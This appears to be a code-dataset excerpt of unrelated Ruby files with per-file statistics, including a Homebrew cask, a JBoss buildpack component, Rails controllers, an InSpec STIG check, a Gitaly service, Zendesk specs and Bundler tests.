name "芒果TV"
desc "Mango TV video app"
homepage "https://www.mgtv.com/app/"
livecheck do
url "https://pcconf.api.mgtv.com/getPcDownloadUrl?source=mango2"
strategy :header_match
regex(%r{/app/mac/(\d+(?:[._]\d+)+)/mgtv[._-]mango\.dmg}i)
end
depends_on macos: ">= :sierra"
app "芒果TV.app"
zap trash: [
"~/Library/Caches/com.mgtv.pcclientx",
"~/Library/Containers/com.mgtv.MGTV-macOS",
"~/Library/Preferences/com.mgtv.pcclientx.plist",
"~/Library/Saved Application State/com.mgtv.pcclientx.savedState",
]
end
| 27.571429 | 75 | 0.683938 |
26ef662cb53e1e5891a0ca28cc00febfe2b2da21 | 3,052 | # Encoding: utf-8
# Cloud Foundry Java Buildpack
# Copyright 2013-2017 the original author or authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'fileutils'
require 'java_buildpack/component/versioned_dependency_component'
require 'java_buildpack/container'
require 'java_buildpack/util/java_main_utils'
module JavaBuildpack
module Container
# Encapsulates the detect, compile, and release functionality for applications running Spring Boot CLI
# applications.
class Jboss < JavaBuildpack::Component::VersionedDependencyComponent
# (see JavaBuildpack::Component::BaseComponent#compile)
def compile
download_tar
update_configuration
copy_application
copy_additional_libraries
create_dodeploy
end
# (see JavaBuildpack::Component::BaseComponent#release)
def release
@droplet.java_opts.add_system_property 'jboss.http.port', '$PORT'
[
@droplet.java_home.as_env_var,
@droplet.java_opts.as_env_var,
'exec',
"$PWD/#{(@droplet.sandbox + 'bin/standalone.sh').relative_path_from(@droplet.root)}",
'-b',
'0.0.0.0'
].compact.join(' ')
end
protected
# (see JavaBuildpack::Component::VersionedDependencyComponent#supports?)
def supports?
web_inf? && !JavaBuildpack::Util::JavaMainUtils.main_class(@application)
end
private
def copy_application
FileUtils.mkdir_p root
@application.root.children.each { |child| FileUtils.cp_r child, root }
end
def copy_additional_libraries
web_inf_lib = root + 'WEB-INF/lib'
@droplet.additional_libraries.each { |additional_library| FileUtils.cp_r additional_library, web_inf_lib }
end
def create_dodeploy
FileUtils.touch(webapps + 'ROOT.war.dodeploy')
end
def root
webapps + 'ROOT.war'
end
def update_configuration
standalone_config = @droplet.sandbox + 'standalone/configuration/standalone.xml'
modified = standalone_config.read
.gsub(%r{<location name="/" handler="welcome-content"/>},
'<!-- <location name="/" handler="welcome-content"/> -->')
standalone_config.open('w') { |f| f.write modified }
end
def webapps
@droplet.sandbox + 'standalone/deployments'
end
def web_inf?
(@application.root + 'WEB-INF').exist?
end
end
end
end
| 30.217822 | 114 | 0.662189 |
f71673f1c0676c3ae1df8939501d56d063c3bb16 | 136 | class FooController < ApplicationController
skip_before_filter :authenticate_user!
def index
render :nothing => true
end
end
| 17 | 43 | 0.772059 |
1c0bd8b4c599458d24a5f05a06a115d82f502653 | 274 | #!/usr/bin/env ruby
# -*- encoding: us-ascii -*-
# Determine file format (e.g. packed, unpacked, decoded) for any file
desc "type FILE", "Display the type of a file (e.g. frozen, huffman, etc.)"
def type(file)
check_for_unknown_options(file)
puts File.type(file)
end
| 24.909091 | 75 | 0.693431 |
f70e1c5af13e622ee513085b9ce3ab18981a1914 | 49 | # encoding: utf-8
require 'validation_reflection' | 24.5 | 31 | 0.816327 |
5d6c43b7d426c97b7577d987c7b65c6ae12a8dbe | 1,262 | class ProductsController < Spree::BaseController
resource_controller
helper :taxons
before_filter :load_data, :only => :show
actions :show, :index
index do
before do
@product_cols = 3
end
end
def change_image
@product = Product.available.find_by_param(params[:id])
img = Image.find(params[:image_id])
render :partial => 'image', :locals => {:image => img}
end
private
def load_data
return unless permalink = params[:taxon_path]
@taxon = Taxon.find_by_permalink(params[:taxon_path].join("/") + "/")
end
def collection
if params[:taxon]
@taxon = Taxon.find(params[:taxon])
@search = Product.active.scoped(:conditions =>
["products.id in (select product_id from products_taxons where taxon_id in (" +
@taxon.descendents.inject( @taxon.id.to_s) { |clause, t| clause += ', ' + t.id.to_s} + "))"
]).new_search(params[:search])
else
@search = Product.active.new_search(params[:search])
end
@search.per_page = Spree::Config[:products_per_page]
@search.include = :images
@product_cols = 3
@products ||= @search.all
end
end
| 28.044444 | 133 | 0.591918 |
4ab8ef24575a4d0cc822e88cab13761aee16fce3 | 407 | module MiddlewareDeploymentHelper::TextualSummary
#
# Groups
#
def textual_group_properties
%i(name nativeid)
end
def textual_group_relationships
# Order of items should be from parent to child
%i(ems middleware_server)
end
def textual_group_smart_management
%i(tags)
end
def textual_name
@record.name
end
def textual_nativeid
@record.nativeid
end
end
| 15.074074 | 51 | 0.722359 |
87eaad54e5eeb4cbfd32000be26eb2ab258432fe | 1,628 | control "VCST-67-000017" do
title "The Security Token Service directory tree must have permissions in an
\"out-of-the-box\" state."
desc "As a rule, accounts on a web server are to be kept to a minimum. Only
administrators, web managers, developers, auditors, and web authors require
accounts on the machine hosting the web server. The resources to which these
accounts have access must also be closely monitored and controlled. The
Security Token Service files must be adequately protected with correct
permissions as applied out of the box.
"
desc 'rationale', ''
desc 'check', "
At the command prompt, execute the following command:
# find /usr/lib/vmware-sso/vmware-sts/ -xdev -type f -a '(' -not -user root
-o -not -group root ')' -exec ls -ld {} \\;
If the command produces any output, this is a finding.
"
desc 'fix', "
At the command prompt, execute the following command:
# chown root:root <file_name>
Repeat the command for each file that was returned.
Note: Replace <file_name> for the name of the file that was returned.
"
impact 0.5
tag severity: 'medium'
tag gtitle: 'SRG-APP-000211-WSR-000030'
tag satisfies: ['SRG-APP-000211-WSR-000030', 'SRG-APP-000380-WSR-000072']
tag gid: 'V-239668'
tag rid: 'SV-239668r679076_rule'
tag stig_id: 'VCST-67-000017'
tag fix_id: 'F-42860r679075_fix'
tag cci: ['CCI-001082', 'CCI-001813']
tag nist: ['SC-2', 'CM-5 (1)']
describe command("find '#{input('rootPath')}' -xdev -type f -a \'(\' -not -user root -o -not -group root \')\' -exec ls -ld {} \;") do
its('stdout.strip') { should eq ''}
end
end | 37 | 136 | 0.688575 |
e9d55716c35dcd0b556bcbed6b2f2cf0d93be231 | 82 | module BusinessHelper
def format_id(string)
string.match(/\d/)
end
end | 11.714286 | 23 | 0.682927 |
21ffc9b0e48840c2b673014e5e093e96c1f6c973 | 1,408 | class ArticlesController < ApplicationController
before_action :find_article, only: [:show, :create_comment, :destroy]
before_action :set_cache_control_headers, only: [:index, :show]
before_action :set_private, only: [:create_comment, :create_article]
# Returns all Article objects, and sets a table_key of 'articles',
# and a record_key for each article object: "#{table_key}/#{article_id}"
def index
@articles = Article.all
set_surrogate_key_header 'articles', @articles.map(&:record_key)
end
# Sets a surrogate key for the current article.
#
# Example:
#
# Article[75]
# Surrogate-Key:articles/75
def show
set_surrogate_key_header @article.record_key
end
# Creates a new comment for current article
def create_comment
@article.create_random_comment
redirect_to article_path(@article)
end
# Creates a new article
def create_article
Article.create_random_article
redirect_to articles_url
end
# Deletes the current article.
def destroy
@article.destroy
redirect_to articles_path
end
private
def find_article
@article = Article.find(params[:id])
redirect_to articles_path unless @article
end
# Private: Sets Cache-Control headers to not store content
# Used for create methods.
def set_private
response.headers['Cache-Control'] = 'no-cache, no-store, max-age=0, must-revalidate'
end
end
| 26.074074 | 88 | 0.732244 |
62243ce3ace43fa081548a083d5c2879155cfbbf | 4,187 | module GitalyServer
class RefService < Gitaly::RefService::Service
include Utils
TAGS_PER_MESSAGE = 100
def create_branch(request, call)
bridge_exceptions do
begin
start_point = request.start_point
start_point = 'HEAD' if start_point.empty?
branch_name = request.name
repo = Gitlab::Git::Repository.from_gitaly(request.repository, call)
rugged_ref = repo.rugged.branches.create(branch_name, start_point)
Gitaly::CreateBranchResponse.new(
status: :OK,
branch: Gitaly::Branch.new(
name: rugged_ref.name.b,
target_commit: gitaly_commit_from_rugged(rugged_ref.target)
)
)
rescue Rugged::ReferenceError => e
status = case e.to_s
when /'refs\/heads\/#{branch_name}' is not valid/
:ERR_INVALID
when /a reference with that name already exists/
:ERR_EXISTS
else
:ERR_INVALID_START_POINT
end
Gitaly::CreateBranchResponse.new(status: status)
end
end
end
def delete_branch(request, call)
bridge_exceptions do
begin
branch_name = request.name
raise GRPC::InvalidArgument.new("empty Name") if branch_name.empty?
repo = Gitlab::Git::Repository.from_gitaly(request.repository, call)
repo.delete_branch(branch_name)
Gitaly::DeleteBranchResponse.new
rescue Gitlab::Git::Repository::DeleteBranchError => e
raise GRPC::Internal.new(e.to_s)
end
end
end
def find_branch(request, call)
bridge_exceptions do
branch_name = request.name
raise GRPC::InvalidArgument.new("empty Name") if branch_name.empty?
repo = Gitlab::Git::Repository.from_gitaly(request.repository, call)
rugged_branch = repo.find_branch(branch_name)
gitaly_branch = Gitaly::Branch.new(
name: rugged_branch.name.b,
target_commit: gitaly_commit_from_rugged(rugged_branch.dereferenced_target.raw_commit)
) unless rugged_branch.nil?
Gitaly::FindBranchResponse.new(branch: gitaly_branch)
end
end
def find_all_tags(request, call)
bridge_exceptions do
repo = Gitlab::Git::Repository.from_gitaly(request.repository, call)
Enumerator.new do |y|
repo.tags.each_slice(TAGS_PER_MESSAGE) do |gitlab_tags|
tags = gitlab_tags.map do |gitlab_tag|
rugged_commit = gitlab_tag.dereferenced_target&.raw_commit
gitaly_commit = gitaly_commit_from_rugged(rugged_commit) if rugged_commit
gitaly_tag_from_gitlab_tag(gitlab_tag, gitaly_commit)
end
y.yield Gitaly::FindAllTagsResponse.new(tags: tags)
end
end
end
end
def delete_refs(request, call)
bridge_exceptions do
repo = Gitlab::Git::Repository.from_gitaly(request.repository, call)
begin
if request.refs.any?
repo.delete_refs(*request.refs)
else
repo.delete_all_refs_except(request.except_with_prefix)
end
Gitaly::DeleteRefsResponse.new
rescue Gitlab::Git::Repository::GitError => e
Gitaly::DeleteRefsResponse.new(git_error: e.message)
end
end
end
def get_tag_messages(request, call)
bridge_exceptions do
repository = Gitlab::Git::Repository.from_gitaly(request.repository, call)
Enumerator.new do |y|
request.tag_ids.each do |tag_id|
annotation = repository.rugged.rev_parse(tag_id)
next unless annotation
response = Gitaly::GetTagMessagesResponse.new(tag_id: tag_id)
io = StringIO.new(annotation.message)
while chunk = io.read(Gitlab.config.git.max_commit_or_tag_message_size)
response.message = chunk
y.yield response
response = Gitaly::GetTagMessagesResponse.new
end
end
end
end
end
end
end
| 31.481203 | 96 | 0.620731 |
ed217fe1a558b5a2ba583e19b43d2693731139eb | 284 | module Pipedrive
class SearchResults < Base
def search(params = {})
make_api_call(:get, params.merge(entity_hard_path: 'searchResults'))
end
def field(params = {})
make_api_call(:get, params.merge(entity_hard_path: 'searchResults/field'))
end
end
end
| 23.666667 | 80 | 0.68662 |
2692a243b9cef3685d1883688b3afd67bd958cbe | 240 | class WebNotificationsChannel < ApplicationCable::Channel
def subscribed
stream_from "web_notifications_channel"
# stream_from "some_channel"
end
def unsubscribed
# Any cleanup needed when channel is unsubscribed
end
end
| 21.818182 | 57 | 0.783333 |
1a92e96c552df2b8b9f0c768e030becd2401a047 | 199 | class AddAdditionalMilesAndGeneratorHoursToCarts < ActiveRecord::Migration
def change
add_column :carts, :additional_miles, :integer
add_column :carts, :generator_hours, :integer
end
end
| 28.428571 | 74 | 0.79397 |
1d8e41a01ff186f063f44b3e702a6d7d505c7449 | 606 | Pod::Spec.new do |s|
s.name = "Floc-Commands"
s.version = "0.3.0"
s.summary = "A collection of commands with fluent API for Objective-C."
s.homepage = "https://github.com/sschmid/Floc-Commands"
s.screenshots = "http://sschmid.com/Dev/iOS/Libs/Floc-Commands/Floc-Commands-128.png"
s.license = "MIT"
s.author = { "Simon Schmid" => "[email protected]" }
s.source = { :git => "https://github.com/sschmid/Floc-Commands.git", :tag => "0.3.0" }
s.platform = :ios, '5.0'
s.source_files = "Floc-Commands/Classes/**/*.{h,m}"
s.requires_arc = true
end
| 43.285714 | 94 | 0.605611 |
391980d34000fa7982602c969afdb5190c3551bf | 4,258 | class CalendarDateSelect
FORMATS = {
:natural => {
:date => "%B %d, %Y",
:time => " %I:%M %p"
},
:hyphen_ampm => {
:date => "%Y-%m-%d",
:time => " %I:%M %p",
:javascript_include => "calendar_date_select_format_hyphen_ampm"
}
}
cattr_accessor :image
@@image = "calendar.gif"
cattr_reader :format
@@format = FORMATS[:natural]
class << self
def format=(format)
raise "CalendarDateSelect: Unrecognized format specification: #{format}" unless FORMATS.has_key?(format)
@@format = FORMATS[format]
end
def javascript_format_include
@@format[:javascript_include]
end
def date_format_string(time=false)
@@format[:date] + ( time ? @@format[:time] : "" )
end
end
module FormHelper
def calendar_date_select_tag( name, value = nil, options = {})
calendar_options = calendar_date_select_process_options(options)
value = (value.strftime(calendar_options[:format]) rescue value) if (value.respond_to?("strftime"))
calendar_options.delete(:format)
options[:id] ||= name
tag = calendar_options[:embedded] ?
hidden_field_tag(name, value, options) :
text_field_tag(name, value, options)
calendar_date_select_output(tag, calendar_options)
end
def calendar_date_select_process_options(options)
calendar_options = {}
callbacks = [:before_show, :before_close, :after_show, :after_close, :after_navigate]
for key in [:time, :embedded, :buttons, :format, :year_range] + callbacks
calendar_options[key] = options.delete(key) if options.has_key?(key)
end
# surround any callbacks with a function, if not already done so
for key in callbacks
calendar_options[key] = "function(param) { #{calendar_options[key]} }" unless calendar_options[key].include?("function") if calendar_options[key]
end
calendar_options[:year_range] ||= 10
calendar_options[:format] ||= CalendarDateSelect.date_format_string(calendar_options[:time])
calendar_options
end
def calendar_date_select(object, method, options={})
obj = instance_eval("@#{object}") || options[:object]
if !options.include?(:time) && obj.class.respond_to?("columns_hash")
column_type = (obj.class.columns_hash[method.to_s].type rescue nil)
options[:time] = true if column_type==:datetime
end
calendar_options = calendar_date_select_process_options(options)
value = obj.send(method).strftime(calendar_options[:format]) rescue obj.send("#{method}_before_type_cast")
calendar_options.delete(:format)
options = options.merge(:value => value)
tag = ActionView::Helpers::InstanceTag.new(object, method, self, nil, options.delete(:object))
calendar_date_select_output(
tag.to_input_field_tag(calendar_options[:embedded] ? "hidden" : "text", options),
calendar_options
)
end
def calendar_date_select_output(input, calendar_options = {})
out = input
if calendar_options[:embedded]
uniq_id = "cds_placeholder_#{(rand*100000).to_i}"
# we need to be able to locate the target input element, so lets stick an invisible span tag here we can easily locate
out << content_tag(:span, nil, :style => "display: none; position: absolute;", :id => uniq_id)
out << javascript_tag("new CalendarDateSelect( $('#{uniq_id}').previous(), #{options_for_javascript(calendar_options)} ); ")
else
out << " "
out << image_tag(CalendarDateSelect.image,
:onclick => "new CalendarDateSelect( $(this).previous(), #{options_for_javascript(calendar_options)} );",
:style => 'border:0px; cursor:pointer;')
end
out
end
end
end
module ActionView
module Helpers
class FormBuilder
def calendar_date_select(method, options = {})
@template.calendar_date_select(@object_name, method, options.merge(:object => @object))
end
end
end
end
| 35.190083 | 154 | 0.62635 |
e8a5946ab8856920aa92eb6a5638c3ae9985ef7c | 1,183 | require "#{File.dirname(__FILE__)}/spec_helper"
describe 'Unifying a bound value' do
[nil, true, false,
:sym, "str", /regex/,
3, 2.0,
Object.new, Class.new.new,
[], {}].each do |type|
describe "for #{type.class} instances" do
it 'passes unification for an object of equal value' do
local do |var, var2|
unify var, type
var.should == type
type.should == var
lambda {unify var, type}.should_not raise_error
unify var2, type
var.should == var2
var2.should == var
lambda {unify var, var2}.should_not raise_error
end
end
it 'fails unification for an object of inequal value' do
different = Object.new
local do |var, var2|
unify var, type
var.should_not == different
different.should_not == var
lambda {unify var, different}.should raise_error(Dataflow::UnificationError)
unify var2, different
var.should_not == var2
var2.should_not == var
lambda {unify var, different}.should raise_error(Dataflow::UnificationError)
end
end
end
end
end
| 28.853659 | 86 | 0.591716 |
4ac9017ec04a78bffd0d6e04b838c3ab5ab7c450 | 452 | # frozen_string_literal: true
module InterviewsHelper
ICON = { talk: { icon: 'fa-comments bg-yellow', title: I18n.t('activerecord.attributes.interview.type_ofs.talk') },
technical: { icon: 'fa-wrench bg-aqua', title: I18n.t('activerecord.attributes.interview.type_ofs.technical') } }.freeze
def interview_icon(enum_type)
tag.i class: "fa #{ICON[enum_type.to_s.to_sym][:icon]}", title: ICON[enum_type.to_s.to_sym][:title]
end
end
| 41.090909 | 131 | 0.716814 |
1dcd41fd2d70618eea7ad2f7b6fa374dda4e113e | 1,785 | #
# Author:: Tim Smith (<[email protected]>)
# Copyright:: Copyright (c) Chef Software Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require "spec_helper"
require "support/shared/unit/resource/static_provider_resolution"
describe Chef::Resource::ZypperPackage, "initialize" do
static_provider_resolution(
resource: Chef::Resource::ZypperPackage,
provider: Chef::Provider::Package::Zypper,
name: :zypper_package,
action: :install,
os: "linux",
platform_family: "suse"
)
end
describe Chef::Resource::ZypperPackage, "defaults" do
let(:resource) { Chef::Resource::ZypperPackage.new("fakey_fakerton") }
it "sets the default action as :install" do
expect(resource.action).to eql([:install])
end
it "supports :install, :lock, :purge, :reconfig, :remove, :unlock, :upgrade actions" do
expect { resource.action :install }.not_to raise_error
expect { resource.action :lock }.not_to raise_error
expect { resource.action :purge }.not_to raise_error
expect { resource.action :reconfig }.not_to raise_error
expect { resource.action :remove }.not_to raise_error
expect { resource.action :unlock }.not_to raise_error
expect { resource.action :upgrade }.not_to raise_error
end
end
| 34.326923 | 89 | 0.735014 |
38d6762b0398bde3aa301d5317f4d229cf59f1fc | 4,268 | # frozen_string_literal: true
require 'spec_helper'
describe 'memberships' do
let!(:client) { create_client }
let!(:user) { client.users.create!(email: mock_email, name: mock_uuid, verified: true) }
let(:organization) { client.organizations.create!(name: mock_uuid) }
include_examples 'zendesk#resource',
create_params: lambda {
{
organization_id: client.organizations.create!(name: mock_uuid).identity,
user_id: user.id,
}
},
collection: -> { client.memberships(user: user) },
paged: true,
update: false,
search: false
it 'should be marked as default' do
membership = client.memberships.create!(organization: organization, user: user).reload
another_organization = client.organizations.create!(name: mock_uuid)
another_membership = client.memberships.create!(organization: another_organization, user: user).reload
expect(membership.default).to eq(true)
expect(another_membership.default).to eq(false)
expect do
another_membership.default!
end.to change {
another_membership.reload.default
}.from(false).to(true)
expect(membership.reload.default).to be_falsey
end
it "should get an organization's memberships" do
another_user = client.users.create!(email: mock_email, name: mock_uuid, verified: true)
another_organization = client.organizations.create!(name: mock_uuid)
another_organization.memberships.create!(user: another_user)
another_organization.memberships.create!(user: user)
organization.memberships.create!(user: another_user)
expect(organization.memberships.size).to eq(1)
expect(another_organization.memberships.size).to eq(2)
end
it "should get an user's memberships" do
another_user = client.users.create!(email: mock_email, name: mock_uuid, verified: true)
another_organization = client.organizations.create!(name: mock_uuid)
another_organization.memberships.create!(user: another_user)
user_membership = another_organization.memberships.create!(user: user)
organization.memberships.create!(user: another_user)
expect(user.memberships.to_a).to eq([user_membership])
expect(another_user.memberships.size).to eq(2)
end
it "should get a user's organizations" do
another_user = client.users.create!(email: mock_email, name: mock_uuid, verified: true)
another_organization = client.organizations.create!(name: mock_uuid)
another_organization.memberships.create!(user: another_user)
another_organization.memberships.create!(user: user)
organization.memberships.create!(user: another_user)
expect(user.organizations.to_a).to contain_exactly(another_organization)
expect(another_organization.users.to_a).to contain_exactly(user, another_user)
expect(organization.users.to_a).to contain_exactly(another_user)
end
describe 'create_membership' do
it 'should error when organization does not exist' do
expect do
client.create_membership('membership' => { 'user_id' => user.identity, 'organization_id' => 99 })
end.to raise_exception(Zendesk2::Error, /RecordInvalid/)
end
it 'should error when creating a duplicate membership' do
client.create_membership('membership' => {
'user_id' => user.identity,
'organization_id' => organization.identity,
})
expect do
client.create_membership('membership' => {
'user_id' => user.identity,
'organization_id' => organization.identity,
})
end.to raise_exception(Zendesk2::Error, /RecordInvalid/)
end
it 'should error when user does not exist' do
expect do
client.create_membership('membership' => { 'user_id' => 99, 'organization_id' => organization.identity })
end.to raise_exception(Zendesk2::Error, /RecordNotFound/)
end
end
end
| 41.038462 | 113 | 0.651359 |
ab841f9beed5dd6f5adb1ec95b13ace4f4eaaaa6 | 1,470 | require 'date'
require 'safe_yaml/load'
SafeYAML::OPTIONS[:suppress_warnings] = true
module Twine
class Plugin
attr_reader :debug, :config
def initialize
@debug = false
require_gems
end
###
# require gems from the yaml config.
#
# gems: [twine-plugin1, twine-2]
#
# also works with single gem
#
# gems: twine-plugin1
#
def require_gems
# ./twine.yml # current working directory
# ~/.twine # home directory
# /etc/twine.yml # etc
cwd_config = join_path Dir.pwd, 'twine.yml'
home_config = join_path Dir.home, '.twine'
etc_config = '/etc/twine.yml'
config_order = [cwd_config, home_config, etc_config]
puts "Config order: #{config_order}" if debug
config_order.each do |config_file|
next unless valid_file config_file
puts "Loading: #{config_file}" if debug
@config = SafeYAML.load_file config_file
puts "Config yaml: #{config}" if debug
break
end
return unless config
# wrap gems in an array. if nil then array will be empty
Kernel.Array(config['gems']).each do |gem_path|
puts "Requiring: #{gem_path}" if debug
require gem_path
end
end
private
def valid_file path
File.exist?(path) && File.readable?(path) && !File.directory?(path)
end
def join_path *paths
File.expand_path File.join(*paths)
end
end
end
| 22.96875 | 73 | 0.617007 |
1d554a9563939f413c526529a366627af19a3b81 | 1,052 | require "spec_helper"
describe "bundle update" do
describe "git sources" do
before :each do
build_repo2
@git = build_git "foo", :path => lib_path("foo") do |s|
s.executables = "foobar"
end
install_gemfile <<-G
source "file://#{gem_repo2}"
git "#{lib_path('foo')}"
gem 'foo'
gem 'rack'
G
end
it "updates the source" do
update_git "foo", :path => @git.path
bundle "update --source foo"
in_app_root do
run <<-RUBY
require 'foo'
puts "WIN" if defined?(FOO_PREV_REF)
RUBY
out.should == "WIN"
end
end
it "unlocks gems that were originally pulled in by the source" do
update_git "foo", "2.0", :path => @git.path
bundle "update --source foo"
should_be_installed "foo 2.0"
end
it "leaves all other gems frozen" do
update_repo2
update_git "foo", :path => @git.path
bundle "update --source foo"
should_be_installed "rack 1.0"
end
end
end | 21.469388 | 69 | 0.563688 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.